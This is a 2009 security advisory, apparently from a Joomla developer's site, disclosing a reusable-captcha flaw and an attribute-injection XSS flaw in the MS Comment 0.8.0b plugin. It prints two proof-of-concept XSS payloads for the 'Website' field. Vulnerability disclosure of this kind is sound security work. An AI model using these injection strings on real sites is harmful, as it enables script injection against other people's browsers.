Jeff Channell | MS Comment 0.8.0b Multiple Vulnerabilities | Joomla!

MS Comment 0.8.0b Multiple Vulnerabilities

Thursday, 17 September 2009 00:00

MS Comment 0.8.0b for Joomla, a commenting plugin, suffers from an multiple vulnerabilities.

Captcha Cracking

The submission uses AJAX and fails to reset the captcha after a submission. Read once, write many.
Website Input XSS

The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
```
" onmouseover="alert(String.fromCharCode(88,83,83))
```
```
" style="color:expression(alert(String.fromCharCode(88,83,83)))
```
Timeline
- Vulnerabilities Discovered: 31 July 2009
- Vendor Notified: 31 July 2009
- Vendor Response: ... 2009
- Update Available: ... 2009
- Disclosure: 17 September 2009

Last Updated on Thursday, 30 September 2010 17:36

Add your comment

Your name:
Comment:

Word verification:

Featured Extensions

JoomFav

$3.00
FREE
You Save: $3.00

Joonami

$1.00
FREE
You Save: $1.00

JNoGuest

$5.00
FREE
You Save: $5.00

JTemplateInfo

$3.00
FREE
You Save: $3.00

Latest Articles

Most Popular

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Captcha Cracking

Website Input XSS

Timeline

Add your comment

Featured Extensions

Latest Articles

Most Popular

Cart

Keywords

Template Info